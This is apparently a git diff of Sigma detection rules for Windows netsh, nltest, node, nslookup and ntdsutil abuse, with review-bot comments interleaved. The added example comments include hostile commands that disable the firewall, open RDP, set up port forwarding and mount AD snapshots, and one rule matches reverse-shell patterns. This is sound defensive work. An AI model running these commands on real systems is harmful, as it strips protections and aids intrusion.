- CommandLine|contains:
+ CommandLine|contains:
 - :\$Recycle.bin\
 - :\RECYCLER.BIN\
 - :\RECYCLERS.BIN\
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml
index 4cd4f7526..1bb41ca0e 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml
@@ -1,8 +1,7 @@
 title: RDP Connection Allowed Via Netsh.EXE
 id: 01aeb693-138d-49d2-9403-c4f52d7d3d62
 status: test
-description: Detects usage of the netsh command to open and allow connections to port
- 3389 (RDP). As seen used by Sarwent Malware
+description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
 references:
 - https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/
 author: Sander Wiebing
@@ -19,15 +18,18 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \netsh.exe
- - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
 selection_cli:
- CommandLine|contains|all:
+ # Example:
+ # Old: netsh firewall add portopening TCP 3389 "Open Port 3389"
+ # New: netsh advfirewall firewall add rule name= "Open Port 3389" dir=in action=allow protocol=TCP localport=3389
+ CommandLine|contains|all:
 - 'firewall '
 - 'add '
 - 'tcp '
 - '3389'
- CommandLine|contains:
+ CommandLine|contains:
 - portopening
 - allow
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_delete_rule.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_delete_rule.yml
index b630a2974..e9f2986b7 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_delete_rule.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_delete_rule.yml
@@ -1,8 +1,7 @@
 title: Firewall Rule Deleted Via Netsh.EXE
 id: 1a5fefe6-734f-452e-a07d-fc1c35bce4b2
 status: test
-description: Detects the removal of a port or application rule in the Windows Firewall
- configuration using netsh
+description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh
 references:
 - https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/
 author: frack113
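Review bot: The "New" example comment added above `CommandLine|contains|all:` in proc_creation_win_netsh_fw_allow_rdp.yml appears to carry a stray space in `name= "Open Port 3389"`; netsh takes the argument as `name="Open Port 3389"`, and an analyst who replays the example comment to test the rule would presumably hit a syntax error rather than the event the rule is meant to fire on. I would write the comment as `# New: netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389`. The matching itself is unaffected either way, since the selection only looks for the `firewall `, `add `, `tcp ` and `3389` substrings, which both spellings contain.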
@@ -19,14 +18,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \netsh.exe
- - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - firewall
 - 'delete '
 filter_optional_dropbox:
- CommandLine|contains: name=Dropbox
+ CommandLine|contains: name=Dropbox
 ParentProcessName|endswith: \Dropbox.exe
 condition: process_creation and (all of selection_* and not 1 of filter_optional_*)
 falsepositives:
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_disable.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_disable.yml
index 37d8b22b6..9346fcde5 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_disable.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_disable.yml
@@ -21,20 +21,22 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \netsh.exe
- - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
 selection_cli_1:
- CommandLine|contains|all:
+ # Example: netsh firewall set opmode disable
+ CommandLine|contains|all:
 - firewall
 - set
 - opmode
 - disable
 selection_cli_2:
- CommandLine|contains|all:
+ # Example: netsh advfirewall set currentprofile state off
+ CommandLine|contains|all:
 - advfirewall
 - set
 - state
- - 'off'
+ - off
 condition: process_creation and (selection_img and 1 of selection_cli_*)
 falsepositives:
 - Legitimate administration activity
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml
index a71931462..92fe9ff2d 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml
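Review bot: Dropping the quotes around `off` in selection_cli_2 of proc_creation_win_netsh_fw_disable.yml changes the YAML type of that list entry for any YAML 1.1 loader (PyYAML and the upstream Sigma tooling built on it), where a bare `off` is the boolean false rather than the string the rule means to find in CommandLine; the selection would then silently stop matching `netsh advfirewall set ... state off`, which is the exact command the new example comment documents. The other three entries (`advfirewall`, `set`, `state`) are not YAML boolean literals and are unaffected. Keep the old spelling, `- 'off'`. Whether the loader used by this project's own engine is affected cannot be confirmed from the hunk, but the quoted form is correct for every loader, so there is no reason to drop it.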
@@ -1,8 +1,7 @@
 title: Netsh Allow Group Policy on Microsoft Defender Firewall
 id: 347906f3-e207-4d18-ae5b-a9403d6bcdef
 status: test
-description: Adversaries may modify system firewalls in order to bypass controls limiting
- network usage
+description: Adversaries may modify system firewalls in order to bypass controls limiting network usage
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall
 - https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior
@@ -20,10 +19,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \netsh.exe
- - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - advfirewall
 - firewall
 - set
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml
index ce36f5517..a4fc613ba 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml
@@ -1,8 +1,7 @@
 title: Firewall Configuration Discovery Via Netsh.EXE
 id: 0e4164da-94bc-450d-a7be-a4b176179f1f
 status: experimental
-description: Adversaries may look for details about the network configuration and
- settings of systems they access or through information discovery of remote systems
+description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules
 - https://ss64.com/nt/netsh.html
@@ -20,14 +19,14 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \netsh.exe
- - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - 'netsh '
 - 'show '
 - 'firewall '
- CommandLine|contains:
+ CommandLine|contains:
 - 'config '
 - 'state '
 - 'rule '
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_set_rule.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_set_rule.yml
index f68837360..819761940 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_fw_set_rule.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_fw_set_rule.yml
@@ -1,8 +1,7 @@
 title: Firewall Rule Update Via Netsh.EXE
 id: a70dcb37-3bee-453a-99df-d0c683151be6
 status: test
-description: Detects execution of netsh with the "advfirewall" and the "set" option
- in order to set new values for properties of a existing rule
+description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule
 references:
 - https://ss64.com/nt/netsh.html
 author: X__Junior (Nextron Systems)
@@ -17,10 +16,12 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \netsh.exe
- - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
+ # Example 1: netsh advfirewall firewall set rule "group=\"Network Discovery\" " new enable=Yes"
+ # Example 2: netsh advfirewall firewall set rule "group=\"File and Printer Sharing\" " new enable=Yes"
 - ' firewall '
 - ' set '
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml
index 1fc454447..8d2e48474 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml
@@ -1,16 +1,13 @@
 title: Potential Persistence Via Netsh Helper DLL
 id: 56321594-9087-49d9-bf10-524fe8479452
 related:
- - id: c90362e0-2df3-4e61-94fe-b37615814cb1
- type: similar
- - id: e7b18879-676e-4a0e-ae18-27039185a8e7
- type: similar
+ - id: c90362e0-2df3-4e61-94fe-b37615814cb1
+ type: similar
+ - id: e7b18879-676e-4a0e-ae18-27039185a8e7
+ type: similar
 status: test
-description: 'Detects the execution of netsh with "add helper" flag in order to add
- a custom helper DLL. This technique can be abused to add a malicious helper DLL
- that can be used as a persistence proxy that gets called when netsh.exe is executed.
-
- '
+description: |
+ Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md
 - https://github.com/outflanknl/NetshHelperBeacon
@@ -31,10 +28,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - OriginalFileName: netsh.exe
- - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - add
 - helper
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_packet_capture.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_packet_capture.yml
index b16e499d9..6a8f10fa5 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_packet_capture.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_packet_capture.yml
@@ -1,8 +1,7 @@
 title: New Network Trace Capture Started Via Netsh.EXE
 id: d3c3861d-c504-4c77-ba55-224ba82d0118
 status: test
-description: Detects the execution of netsh with the "trace" flag in order to start
- a network capture
+description: Detects the execution of netsh with the "trace" flag in order to start a network capture
 references:
 - https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/
 - https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/
@@ -21,10 +20,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \netsh.exe
- - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - trace
 - start
 condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding.yml
index 58c471c4b..e40953597 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding.yml
@@ -1,14 +1,12 @@
 title: New Port Forwarding Rule Added Via Netsh.EXE
 id: 322ed9ec-fcab-4f67-9a34-e7c6aef43614
 status: test
-description: Detects the execution of netsh commands that configure a new port forwarding
- (PortProxy) rule
+description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
 references:
 - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
 - https://adepts.of0x.cc/netsh-portproxy-code/
 - https://www.dfirnotes.net/portproxy_detection/
-author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan
- Poudel
+author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
 date: 2019/01/29
 modified: 2023/09/01
 tags:
@@ -24,22 +22,23 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \netsh.exe
- - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
 selection_cli_1:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - interface
 - portproxy
 - add
 - v4tov4
 selection_cli_2:
- CommandLine|contains|all:
- - 'i '
- - 'p '
- - 'a '
- - 'v '
+ CommandLine|contains|all:
+ # Example: netsh I p a v l=8001 listena=127.0.0.1 connectp=80 c=192.168.1.1
+ - 'i ' # interface
+ - 'p ' # portproxy
+ - 'a ' # add
+ - 'v ' # v4tov4
 selection_cli_3:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - connectp
 - listena
 - c=
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml
index 326ea71d1..43e596ac5 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml
@@ -1,8 +1,7 @@
 title: RDP Port Forwarding Rule Added Via Netsh.EXE
 id: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63
 status: test
-description: Detects the execution of netsh to configure a port forwarding of port
- 3389 (RDP) rule
+description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
 references:
 - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
 author: Florian Roth (Nextron Systems), oscd.community
@@ -21,10 +20,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \netsh.exe
- - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - ' i'
 - ' p'
 - =3389
diff --git a/sigma/builtin/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml b/sigma/builtin/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml
index 40bd6b660..42014122a 100644
--- a/sigma/builtin/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml
@@ -19,10 +19,10 @@ detection:
 EventID: 4688
 Channel: Security
 selection_img:
- - NewProcessName|endswith: \netsh.exe
- - OriginalFileName: netsh.exe
+ - NewProcessName|endswith: \netsh.exe
+ - OriginalFileName: netsh.exe
 selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - wlan
 - ' s'
 - ' p'
diff --git a/sigma/builtin/process_creation/proc_creation_win_nltest_execution.yml b/sigma/builtin/process_creation/proc_creation_win_nltest_execution.yml
index 5a7436bcb..106fe4a9e 100644
--- a/sigma/builtin/process_creation/proc_creation_win_nltest_execution.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_nltest_execution.yml
@@ -1,10 +1,10 @@ title: Nltest.EXE Execution id: 903076ff-f442-475a-b667-4f246bcc203b related: - - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 - type: similar - - id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 - type: obsoletes + - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 + type: similar + - id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 + type: obsoletes status: test description: Detects nltest commands that can be used for information discovery references: @@ -24,8 +24,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \nltest.exe - - OriginalFileName: nltestrk.exe + - NewProcessName|endswith: \nltest.exe + - OriginalFileName: nltestrk.exe condition: process_creation and selection falsepositives: - Legitimate administration activity diff --git a/sigma/builtin/process_creation/proc_creation_win_nltest_recon.yml b/sigma/builtin/process_creation/proc_creation_win_nltest_recon.yml index c84738f64..1ea15022c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_nltest_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_nltest_recon.yml @@ -1,12 +1,12 @@ title: Potential Recon Activity Via Nltest.EXE id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 related: - - id: 410ad193-a728-4107-bc79-4419789fcbf8 - type: similar - - id: 903076ff-f442-475a-b667-4f246bcc203b - type: similar - - id: 77815820-246c-47b8-9741-e0def3f57308 - type: obsoletes + - id: 410ad193-a728-4107-bc79-4419789fcbf8 + type: similar + - id: 903076ff-f442-475a-b667-4f246bcc203b + type: similar + - id: 77815820-246c-47b8-9741-e0def3f57308 + type: obsoletes status: test description: Detects nltest commands that can be used for information discovery references: 
@@ -33,21 +33,21 @@ detection: EventID: 4688 Channel: Security selection_nltest: - - NewProcessName|endswith: \nltest.exe - - OriginalFileName: nltestrk.exe + - NewProcessName|endswith: \nltest.exe + - OriginalFileName: nltestrk.exe selection_recon: - - CommandLine|contains|all: - - server - - query - - CommandLine|contains: - - /user - - all_trusts - - 'dclist:' - - 'dnsgetdc:' - - domain_trusts - - 'dsgetdc:' - - parentdomain - - trusted_domains + - CommandLine|contains|all: + - server + - query + - CommandLine|contains: + - /user + - all_trusts # Flag for /domain_trusts + - 'dclist:' + - 'dnsgetdc:' + - domain_trusts + - 'dsgetdc:' + - parentdomain + - trusted_domains condition: process_creation and (all of selection_*) falsepositives: - Legitimate administration use but user and host must be investigated diff --git a/sigma/builtin/process_creation/proc_creation_win_node_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_node_abuse.yml index 17453069a..a16c24ba8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_node_abuse.yml +++ b/sigma/builtin/process_creation/proc_creation_win_node_abuse.yml @@ -1,9 +1,7 @@ title: Potential Arbitrary Code Execution Via Node.EXE id: 6640f31c-01ad-49b5-beb5-83498a5cd8bd status: test -description: Detects the execution node.exe which is shipped with multiple software - such as VMware, Adobe...etc. In order to execute arbitrary code. For example to - establish reverse shell as seen in Log4j attacks...etc +description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return 
@@ -23,12 +21,13 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' --eval ' - NewProcessName|endswith: \node.exe + # Add more pattern of abuse as actions + NewProcessName|endswith: \node.exe action_reverse_shell: - CommandLine|contains|all: + CommandLine|contains|all: - .exec( - net.socket - .connect diff --git a/sigma/builtin/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml index 65f2a491b..102f951c1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml +++ b/sigma/builtin/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml @@ -1,8 +1,7 @@ title: Node Process Executions id: df1f26d3-bea7-4700-9ea2-ad3e990cf90e status: test -description: Detects the execution of other scripts using the Node executable packaged - with Adobe Creative Cloud +description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud references: - https://twitter.com/mttaggart/status/1511804863293784064 author: Max Altgelt (Nextron Systems) @@ -19,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \Adobe Creative Cloud Experience\libs\node.exe + NewProcessName|endswith: \Adobe Creative Cloud Experience\libs\node.exe filter: - CommandLine|contains: Adobe Creative Cloud Experience\js + CommandLine|contains: Adobe Creative Cloud Experience\js # Folder where Creative Cloud's JS resources are located condition: process_creation and (selection and not filter) fields: - NewProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_nslookup_domain_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_nslookup_domain_discovery.yml index e7a2cf3a2..95506a648 100644 --- a/sigma/builtin/process_creation/proc_creation_win_nslookup_domain_discovery.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_nslookup_domain_discovery.yml
@@ -1,8 +1,7 @@
 title: Network Reconnaissance Activity
 id: e6313acd-208c-44fc-a0ff-db85d572e90e
 status: test
-description: Detects a set of suspicious network related commands often used in recon
- stages
+description: Detects a set of suspicious network related commands often used in recon stages
 references:
 - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/
 author: Florian Roth (Nextron Systems)
@@ -20,12 +19,11 @@ detection:
 EventID: 4688
 Channel: Security
 selection_nslookup:
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - nslookup
 - _ldap._tcp.dc._msdcs.
 condition: process_creation and (1 of selection*)
 falsepositives:
- - False positives depend on scripts and administrative tools used in the monitored
- environment
+ - False positives depend on scripts and administrative tools used in the monitored environment
 level: high
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_nslookup_poweshell_download.yml b/sigma/builtin/process_creation/proc_creation_win_nslookup_poweshell_download.yml
index 03b30b54e..d772a5ac8 100644
--- a/sigma/builtin/process_creation/proc_creation_win_nslookup_poweshell_download.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_nslookup_poweshell_download.yml
@@ -1,13 +1,12 @@ title: Nslookup PowerShell Download Cradle - ProcessCreation id: 1b3b01c7-84e9-4072-86e5-fc285a41ff23 related: - - id: 72671447-4352-4413-bb91-b85569687135 - type: obsoletes - - id: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 - type: similar + - id: 72671447-4352-4413-bb91-b85569687135 + type: obsoletes + - id: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 + type: similar status: test -description: Detects suspicious powershell download cradle using nslookup. This cradle - uses nslookup to extract payloads from DNS records +description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records references: - https://twitter.com/Alh4zr3d/status/1566489367232651264 author: Nasreddine Bencherchali (Nextron Systems) @@ -23,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|contains: \nslookup.exe - - OriginalFileName: \nslookup.exe + - NewProcessName|contains: \nslookup.exe + - OriginalFileName: \nslookup.exe selection_cmd: - CommandLine|contains: + CommandLine|contains: - ' -q=txt ' - ' -querytype=txt ' ParentProcessName|endswith: diff --git a/sigma/builtin/process_creation/proc_creation_win_ntdsutil_susp_usage.yml b/sigma/builtin/process_creation/proc_creation_win_ntdsutil_susp_usage.yml index 116b673f5..d39091b03 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ntdsutil_susp_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ntdsutil_susp_usage.yml 
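Review bot: In selection_img the alternative `- OriginalFileName: \nslookup.exe` can never match, because OriginalFileName carries the bare filename from the PE version resource with no path separator, so the leading backslash should be dropped: `- OriginalFileName: nslookup.exe`. The selection still fires through the `NewProcessName|contains` branch, but a renamed copy of the binary, which is what the OriginalFileName branch exists to catch, is missed; whether the Security 4688 event source populates OriginalFileName at all is not visible here, so the branch may be moot for this channel either way. Sibling rules in this commit match the image with `NewProcessName|endswith`; `contains` here is looser and it would be worth aligning it. The rule's condition lies outside the hunk.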
@@ -1,11 +1,10 @@ title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) id: a58353df-af43-4753-bad0-cd83ef35eef5 related: - - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 - type: derived + - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 + type: derived status: test -description: Detects execution of ntdsutil.exe to perform different actions such as - restoring snapshots...etc. +description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11) - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments @@ -22,16 +21,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ntdsutil.exe - - OriginalFileName: ntdsutil.exe + - NewProcessName|endswith: \ntdsutil.exe + - OriginalFileName: ntdsutil.exe selection_cli: - - CommandLine|contains|all: - - snapshot - - 'mount ' - - CommandLine|contains|all: - - ac - - ' i' - - ' ntds' + - CommandLine|contains|all: + - snapshot + - 'mount ' # mounts a specific snapshot - Ex: ntdsutil snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit + - CommandLine|contains|all: + # This offers more coverage to the "selection_oneliner_1" case in rule 8bc64091-6875-4881-aaf9-7bd25b5dda08 + # The shorest form of "activate" can "ac". But "act", "acti"...etc are also valid forms + # Same case with the "instance" flag + - ac + - ' i' + - ' ntds' condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage to restore snapshots diff --git a/sigma/builtin/process_creation/proc_creation_win_ntdsutil_usage.yml b/sigma/builtin/process_creation/proc_creation_win_ntdsutil_usage.yml index 6e266a0d0..83c3314ac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ntdsutil_usage.yml 
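Review bot: The comment block added above the second selection_cli alternative has a typo and a dropped verb, which matters because it is the only explanation of why three very short tokens are matched: `# The shorest form of "activate" can "ac". But "act", "acti"...etc are also valid forms` reads better as `# The shortest form of "activate" is "ac", but "act", "acti"...etc are also valid forms`. The cross-reference to rule 8bc64091-6875-4881-aaf9-7bd25b5dda08 in the same comment is useful and should stay. The condition on the following line already requires selection_img as well, so the loose tokens are scoped to ntdsutil.exe.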
+++ b/sigma/builtin/process_creation/proc_creation_win_ntdsutil_usage.yml
@@ -1,8 +1,7 @@
 title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
 id: 2afafd61-6aae-4df4-baed-139fa1f4c345
 status: test
-description: Detects execution of ntdsutil.exe, which can be used for various attacks
- against the NTDS database (NTDS.DIT)
+description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
 references:
 - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
 author: Thomas Patzke
@@ -19,7 +18,7 @@ detection:
 EventID: 4688
 Channel: Security
 selection:
- NewProcessName|endswith: \ntdsutil.exe
+ NewProcessName|endswith: \ntdsutil.exe
 condition: process_creation and selection
 falsepositives:
 - NTDS maintenance
diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install.yml
index 77eafb092..291992307 100644
--- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install.yml
@@ -1,11 +1,10 @@
 title: Driver/DLL Installation Via Odbcconf.EXE
 id: 3f5491e2-8db8-496b-9e95-1029fce852d4
 related:
- - id: cb0fe7c5-f3a3-484d-aa25-d350a7912729
- type: similar
+ - id: cb0fe7c5-f3a3-484d-aa25-d350a7912729
+ type: similar
 status: experimental
-description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a
- new ODBC driver. Attackers abuse this to install and run malicious DLLs.
+description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.
 references:
 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/
 - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176
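Review bot: In proc_creation_win_ntdsutil_usage.yml the selection keys only on `NewProcessName|endswith: \ntdsutil.exe`, whereas the derived rule a58353df-af43-4753-bad0-cd83ef35eef5 earlier in this commit pairs the image match with an OriginalFileName alternative, so a renamed copy of the binary is covered there but not here. Turning selection into the same two-entry list, `- NewProcessName|endswith: \ntdsutil.exe` and `- OriginalFileName: ntdsutil.exe`, keeps `condition: process_creation and selection` unchanged and makes the two rules consistent. This gap predates the reflow, and whether the Security 4688 event populates OriginalFileName is not visible in the hunk, so the extra branch may only pay off with enriched sources.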
@@ -23,16 +22,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains|all: + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains|all: - 'INSTALLDRIVER ' - .dll condition: process_creation and (all of selection_*) falsepositives: - - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. - Investigate the path of the DLL and its contents to determine if the action - is authorized. + - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml index 990f16588..6b92d7f2c 